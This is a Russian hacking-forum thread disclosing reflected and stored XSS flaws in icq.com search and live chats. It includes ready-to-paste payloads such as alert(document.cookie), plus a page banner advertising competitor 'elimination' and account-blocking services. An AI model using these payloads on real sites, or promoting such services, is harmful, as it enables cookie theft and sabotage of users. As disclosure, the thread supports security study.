XSS icq.com

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Skype, IRC, ICQ, Jabber и другие IM
XSS icq.com

Опции темы

Поиск в этой теме

Опции просмотра

02.11.2015, 23:20

kingbeef

Новичок

Регистрация: 08.04.2010

Сообщений: 1

С нами: 8469890

Репутация: 0

Код:

http://search.icq.com/search/results.php?q=%5Cx3C%5Cx2Fscript%5Cx3E%5Cx3Cscript%5Cx3Ealert%5Cx28document.domain%5Cx29%5Cx3C%5Cx2Fscript%5Cx3E&ch_id=start&search_mode=web

Куки с основного сайта.

𝕏 Twitter Reddit Telegram Копировать ссылку

03.11.2015, 00:58

Poltergeist

Познающий

Регистрация: 22.06.2010

Сообщений: 52

С нами: 8363126

Репутация: 9

Т.н. reflected XSS на этом search.icq.com уже вычищают-вычищают много лет, и все никак, как видно. Их и постили на сайтах, где публикуют XSS, и я находил какие-то давным-давно. Помню, в 2012-м после редизайна страница профайла просто кишела stored XSS. Их там было порядка 15 штук на разных страницах. Потом пофиксили, но криворуко, поэтому был второй дубль, правда эксплуатация была чуть более замудренной. Но было весело.

14.02.2016, 21:06

Poltergeist

Познающий

Регистрация: 22.06.2010

Сообщений: 52

С нами: 8363126

Репутация: 9

Stored XSS в ICQ лайвчатах. Пример:

Код:

https://icq.com/chat/AqGIzmxQTeANPGrCCw

Уязвимы поля "Имя" и "Описание".

Код HTML:

">alert(document.cookie)
">alert("Stored XSS")

Лайвчат можно создать через приложение для iOS или Android.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Внести депозит

Депозит создан

Вывести депозит